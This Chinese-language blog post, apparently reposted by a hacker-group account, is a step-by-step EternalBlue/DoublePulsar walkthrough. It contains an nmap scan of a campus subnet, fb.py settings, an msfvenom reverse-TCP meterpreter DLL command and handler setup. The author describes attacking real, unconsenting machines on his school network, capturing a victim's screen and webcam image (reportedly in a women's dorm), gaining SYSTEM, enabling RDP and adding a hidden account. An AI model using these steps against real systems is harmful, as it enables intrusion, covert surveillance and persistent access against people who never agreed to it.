物理机访问samba服务器

  准备环境

  kalilinux 监听机,或者装有msf和nmap的linux即可,桥接物理机网络

  win03 攻击机 python2.6 + pywin32 环境 桥接

  exp下载链接 https://github.com/misterch0c/shadowbroker

  1

  2

  python-2.6.6.msi

  https://www.python.org/download/releases/2.6.6/

  1

  2

  3

  pywin32-221.win32-py2.6.exe

  https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/

  靶机:不用本地的靶机,虽然测试成功了,但是要实战才有意思。所以扫本地的C段。

  配置攻击机1【win2003】

  把下载的exp压缩包中Windows目录解压到攻击机上,不要解压到有中文目录的路径,不然会报错,解压完后,我们在Windows目录下新建一个空目录“listeningposts”,为什么要建立这个目录,因为fb.py中有个遍历目录的参数,对应的就是这个目录,默认是没有的。

  

  

  利用nmap扫下C段,看有哪些机器开了445端口,主要针对win4 64 的主机进行试验。

  1

  nmap -p 445-O 10.20.70.0/24

  扫描整个C段开放445端口的主机,并且探测系统版本。

  

  针对目标主机 10.20.70.x

  然后运行fb.py脚本,设置参数

  攻击目标

  [?] Default Target IP Address [] : 10.20.70.x

  本机IP

  [?] Default Callback IP Address [] : 10.20.88.207

  是否重定向

  [?] Use Redirection [yes] : no

  是否输出日志

  [?] Base Log directory [D:logs] : no

  

  根据提示,新建一个项目,然后默认设置,直到设置

  use eternalblue

  

  设置好选择Yes,然后一路回车默认,直到出现选择针对的目标系统和加载的MODE

  

  这里我都选择1,因为我针对的系统是X64的win7,MODE用本身自带的一个fuzz框架。然后一路YES回车,直到出现

  

  输入 use doublepulsar

  然后一样默认设置回车yes,直到出现要我们再次设置攻击目标的信息,选择SMB服务,x64系统,利用RunDLL模块。

  

  到这里,配置这个exp已经差不多了,这时候打开kalilinux,利用msf配置一个DLL的后门,因为刚才我的fb.py利用的模块是RUNDLL。

  配置攻击机2【kalilinux】

  利用msf生成一个x64位的dll后门

  1

  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.20.89.101LPORT=5555-f dll > s.dll

  

  然后msfconlse 打开msf

  设置参数开启侦听

  

  1

  2

  3

  4

  5

  6

  7

  8

  msf > use exploit/multi/handler

  msf exploit(handler) > setpayload windows/x64/meterpreter/reverse_tcp

  payload => windows/x64/meterpreter/reverse_tcp

  msf exploit(handler) > set lhost 10.20.89.101

  lhost => 10.20.89.101

  msf exploit(handler) > set lport 5555

  lport => 5555

  msf exploit(handler) > exploit

  设置完kalilinux,把刚才生成的dll后门,放到win03攻击机1的C盘目录下。

  然后在攻击机1下设置开始攻击。

  

  这时候,kalilinux下反弹了一个shell回来,成功了,HELP一下,看看这个shell有什么功能

  

  功能挺多,运行一下截图桌面的命令。

  screenshot

  原来在看爱奇艺

  

  看到拍照功能,试验一下。

  webcam_snap

  竟然一不小心盲到了女寝的C段,学校的wif IP是随机分配的,好吧,我不是有意的,因为隐私问题固打码,看样子妹子也是一脸懵逼,估计摄像头的灯亮了下。:P

  

  运行shell,获取一个system的权限,利用命令开3389,并且创建隐藏账户

  

  功能还有很多,可以利用system权限远程下载一个远控等等,自己挖掘,这里就不继续演示了。排版可能有问题,凑合看吧!

  总结

  这个漏洞基本是通杀的,真的非常可怕,分析了下源码发现全是自带的库,无奈编程太菜,看了下网上的分析,发现这个漏洞也是基于堆栈的底层溢出,底层的东西我相信还有更多的漏洞没被挖掘出来,无法想象真正的黑客组织手里的0day有多可怕,也让我看到了差距有多大。

  两个字总结:震撼!

  参考文章:https://www.jb51.net/hack/95788.html

  https://mp.weixin.qq.com/s?__biz=MzIyNTA1NzAxOA==&mid=502990295&idx=1&sn=181c1e9b01854b87d3d4752c593c4dd4&chksm=700a2442477dad54b542427edad3ec16df8cde9f470ee4e6f4597d4866d64b

  文章出处:枫叶的家

  你会喜欢

  “通杀Windows”的BadLock漏洞是怎么被玩坏的?

  微软Windows漏洞报告

  【技术分享】windows权限提升基础知识

  亲喜欢吗?记得点赞| 留言| 分享

  长按公众号,可“ 置顶”

  ----------------------------------

  要闻,干货,原创,专业

  华夏黑客同盟我们坚持,自由,免费,共享!